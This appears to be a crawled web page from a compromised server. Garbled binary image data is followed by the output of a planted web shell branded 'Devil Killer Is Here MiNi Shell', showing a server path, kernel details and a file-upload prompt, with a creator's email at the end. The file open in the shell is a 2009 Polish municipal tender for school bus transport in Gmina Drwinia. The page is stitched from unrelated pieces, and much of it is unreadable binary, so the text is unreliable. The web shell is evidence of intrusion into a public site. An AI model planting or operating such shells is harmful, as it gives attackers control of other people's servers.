JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090807/271558-N-2009.html

<p class="kh_header"><b>Drwinia: Dowóz młodzieży szkolnej z terenu Gminy Drwinia do Gimnazjum nr 1 w Grobli.</b><br>
<b>Numer ogłoszenia: 271558 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Drwini , Drwinia 57, 32-709 Drwinia, woj. małopolskie, tel. 012 2817 153, 154, faks 012 2817 373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> wwww.drwinia.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz młodzieży szkolnej z terenu Gminy Drwinia do Gimnazjum nr 1 w Grobli..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia  obejmuje : wykonywanie usługi przewozu młodzieży szkolnej z miejscowości : Niedary,  Świniary,  Ispina, Grobla do Gimnazjum nr 1 w Grobli w dniach nauki szkolnej w roku szkolnym : 2009/2010r.
2.	Zamawiający dopuszcza składania ofert częściowych, gdzie część (usługi ) stanowi :
Zadanie nr 1
Wykonywanie usługi przewozu młodzieży szkolnej z miejscowości : Niedary,  Świniary,  Ispina, Grobla do Gimnazjum nr 1 w Grobli w dniach nauki szkolnej w roku szkolnym : 2009/2010r-Duży przewóz (dowóz do szkoły i odwóz ze  szkoły).
Zamawiający szacuje, że łącznie dziennie do Gimnazjum i Szkoły Podstawowej w Grobli dowożonych będzie ok. 61 uczniów.
Pojazdy powinny posiadać co najmniej 40 miejsca  ( 61 uczniów będzie dojeżdżać do Gimnazjum i Szkoły Podstawowej w Grobli) muszą być dopuszczone do przewozu osób, z zachowaniem obowiązujących przepisów BHP oraz ruchu drogowym.
Usługa będzie wykonywana raz dziennie tzn. będzie to dowóz uczniów do szkoły i odwiezienie ich po lekcjach.
Długość trasy dowożenia uczniów wynosi ok. 38 km.
Trasa dowożenia kształtuje się następująco : -Niedary-Świniary-Grobla-Ispina-Grobla
Zamawiający szacuje, ze w ciągu roku szkolnego 2009/2010 na w/w trasie świadczonych będzie 7 068 wozokilometrów.
Zamawiający zastrzega sobie możliwość zmiany trasy.
Dokładne godziny dowozu i odwożenia uczniów zostaną sprecyzowane w umowie między Zamawiającym a Wykonawcą oraz po uzgodnieniu z Dyrektorem Gimnazjum.
W razie awarii pojazdu lub w razie wystąpienia innych okoliczności uniemożliwiających dowóz lub odwóz dzieci i młodzieży zawinionych przez Wykonawcę, Wykonawca jest zobowiązany dostarczyć pojazd zastępczy, spełniający wszystkie standarty w terminie nie przekraczającym 2 godziny na własny koszt.
Zamawiający nie dopuszcza składania ofert wariantowych.
Zadanie nr 2
Wykonywanie usługi przewozu młodzieży szkolnej z miejscowości : Niedary,  Świniary,  Ispina, Grobla do Gimnazjum nr 1 w Grobli w dniach nauki szkolnej w roku szkolnym : 2009/2010r-Mały  przewóz (odwóz ze szkoły).
Zamawiający szacuje, że łącznie dziennie z Gimnazjum i Szkoły Podstawowej w Grobli odwożonych będzie ok. 23 uczniów
Pojazdy powinny posiadać co najmniej 15 miejsc  muszą być dopuszczone do przewozu osób, z zachowaniem obowiązujących przepisów BHP oraz ruchu drogowym.
Usługa będzie wykonywana raz dziennie tzn. będzie to odwóz uczniów ze szkoły.
Długość trasy odwożenia uczniów wynosi ok. 16 km. Ilość kursów małego przewozy może być zmniejszona  z 4 do 3 w tygodniu.
Trasa odwożenia kształtuje się następująco : Świniary-Niedary i Grobla-Ispina-Grobla.
Zamawiający szacuje, ze w ciągu roku szkolnego 2009/2010 na w/w trasie świadczonych będzie 2 976 wozokilometrów.
Zamawiający zastrzega sobie możliwość zmiany trasy.
Dokładne godziny  odwożenia uczniów zostaną sprecyzowane w umowie między Zamawiającym a Wykonawcą oraz po uzgodnieniu z Dyrektorem Gimnazjum.
W razie awarii pojazdu lub w razie wystąpienia innych okoliczności uniemożliwiających  odwóz dzieci i młodzieży zawinionych przez Wykonawcę, Wykonawca jest zobowiązany dostarczyć pojazd zastępczy, spełniający wszystkie standarty w terminie nie przekraczającym 2 godziny na własny koszt.
Zamawiający nie dopuszcza składania ofert wariantowych.
Zamawiający zastrzega sobie możliwość zmiany trasy. Dokładnie godziny odwożenia uczniów zostaną sprecyzowane w umowie między Zamawiającym a Wykonawcą oraz po uzgodnieniu z Dyrektorem Gimnazjum. W razie awarii pojazdu lub w razie wystąpienia innych okoliczności uniemożliwiających odwóz dzieci i młodzieży zawinionych przez Wykonawcę, Wykonawca jest zobowiązany dostarczyć pojazd zastępczy, spełniający wszystkie standarty w terminie nie przekraczającym 2 godziny na własny koszt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
1) posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. w szczególności:
wymaga się aby Wykonawca  posiadał licencję na wykonywanie transportu drogowego osób,

2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w szczególności :
w przypadku wiedzy i doświadczenia wymaga się, aby Wykonawca w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał  z należytą starannością min. 1 usługę o podobnym charakterze tj. rodzaju i wartości odpowiadającej  przedmiotu zamówienia (liczonej jako iloczyn ceny oferty i szacowanej ilości wozokilometrów do wykonania w ciągu całego roku szkolnego podanej w niniejszej specyfikacji),
w przypadku potencjału technicznego wymaga się, aby Wykonawca w celu sprawnej realizacji przedmiotu zamówienia dysponował min. 1 autobusem lub busem. Ponadto Zamawiający wymaga, aby w celu potwierdzenia dobrego stanu technicznego pojazdu Wykonawca przedłożył w ofercie aktualne  dokumenty świadczące o przeprowadzonym badaniu technicznym pojazdu, potwierdzającym dopuszczenie go do ruchu. Wielkość autobusu,busu musi być dostosowana do określonej przez Zamawiającego w SIWZ ilości dzieci, które będą dowożone i do Gimnazjum oraz odwożone po zajęciach szkolnych.
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ustawy.
Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie w oparciu o formułę:spełnia-nie spełnia na podstawie dokumentów lub oświadczeń załączonych do oferty.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca przedkłada do oferty, który stanowi załącznik do SIWZ następujące oświadczenia i dokumenty : 1. oświadczenie składane zgodnie z art. 44, w myśl art. 22 ust.1 ustawy-Prawo zamówień publicznych,druk oświadczenia podajemy w zał. do SIWZ, 2. aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert; 3. aktualne zaświadczenie z właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem podatków oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 4. licencję na wykonywanie transportu drogowego osób, 5.wykaz niezbędnych do wykonania zamówienia narzędzi - autobusów,busów będących w dyspozycji Wykonawcy z załączeniem aktualnych dokumentów świadczących o przeprowadzonych badaniach technicznych niniejszych pojazdów, które potwierdzają dopuszczenie ich do ruchu, druk wykazu stanowi zał. do SIWZ.
Jeżeli jest stosowane pisemne zobowiązanie innych podmiotów do udostępnienia wymaganego potencjału technicznego (autobusów, busów) Wykonawca zobowiązany jest dodatkowo załączyć przedmiotowe zobowiązanie do oferty,
6.wykaz wykonywanych usług (min. 1 usługa o podobnym charakterze - tj. odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia-liczonej jako iloczyn ceny oferty i szacowanej ilości wozokilometrów do wykonania w ciągu całego roku szkolnego podanej w niniejszej specyfikacji), w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie, druk wykazu podajemy w zał. do SIWZ.
Ponadto, zgodnie z wytycznymi specyfikacji istotnych warunków zamówienia Wykonawca przedkłada do oferty składanej na formularzu Zamawiającego zaparafowany projekt umowy, którego wzór stanowi załącznik do dokumentacji przetargowej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.drwinia.gmina.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Drwini 57, 32 - 709 Drwinia/I-piętro w pokoju nr 15. Koszt dok. papierowej 12,50 zł Zam. może przek. tą siwz pocztą za potw. odbioru.Dok. można pobrać ze strony www.drwinia.gmina.pl..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2009 godzina 10:00, miejsce: Urząd Gminy w Drwini 57, 32 - 709 Drwinia/sekretariat, pok. nr 20 - II piętro.Dopuszczone jest również składanie ofert drogą pocztową lub za pomocą firmy kurierskiej..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonywanie usługi przewozu młodzieży szkolnej z miejscowości : Niedary,  Świniary,  Ispina, Grobla do Gimnazjum nr 1 w Grobli w dniach nauki szkolnej w roku szkolnym : 2009/2010r-Duży przewóz (dowóz do szkoły i odwóz ze  szkoły)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający szacuje, że łącznie dziennie do Gimnazjum i Szkoły Podstawowej w Grobli dowożonych będzie ok. 61 uczniów.
Pojazdy powinny posiadać co najmniej 40 miejsca  ( 61 uczniów będzie dojeżdżać do Gimnazjum i Szkoły Podstawowej w Grobli) muszą być dopuszczone do przewozu osób, z zachowaniem obowiązujących przepisów BHP oraz ruchu drogowym.
Usługa będzie wykonywana raz dziennie tzn. będzie to dowóz uczniów do szkoły i odwiezienie ich po lekcjach.
Długość trasy dowożenia uczniów wynosi ok. 38 km.
Trasa dowożenia kształtuje się następująco : -Niedary-Świniary-Grobla-Ispina-Grobla
Zamawiający szacuje, ze w ciągu roku szkolnego 2009/2010 na w/w trasie świadczonych będzie 7 068 wozokilometrów.
Zamawiający zastrzega sobie możliwość zmiany trasy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonywanie usługi przewozu młodzieży szkolnej z miejscowości : Niedary,  Świniary,  Ispina, Grobla do Gimnazjum nr 1 w Grobli w dniach nauki szkolnej w roku szkolnym : 2009/2010r-Mały  przewóz (odwóz ze szkoły)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający szacuje, że łącznie dziennie z Gimnazjum i Szkoły Podstawowej w Grobli odwożonych będzie ok. 23 uczniów
Pojazdy powinny posiadać co najmniej 15 miejsc  muszą być dopuszczone do przewozu osób, z zachowaniem obowiązujących przepisów BHP oraz ruchu drogowym.
Usługa będzie wykonywana raz dziennie tzn. będzie to odwóz uczniów ze szkoły.
Długość trasy odwożenia uczniów wynosi ok. 16 km. Ilość kursów małego przewozy może być zmniejszona  z 4 do 3 w tygodniu.
Trasa odwożenia kształtuje się następująco : Świniary-Niedary i Grobla-Ispina-Grobla.
Zamawiający szacuje, ze w ciągu roku szkolnego 2009/2010 na w/w trasie świadczonych będzie 2 976 wozokilometrów.
Zamawiający zastrzega sobie możliwość zmiany trasy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com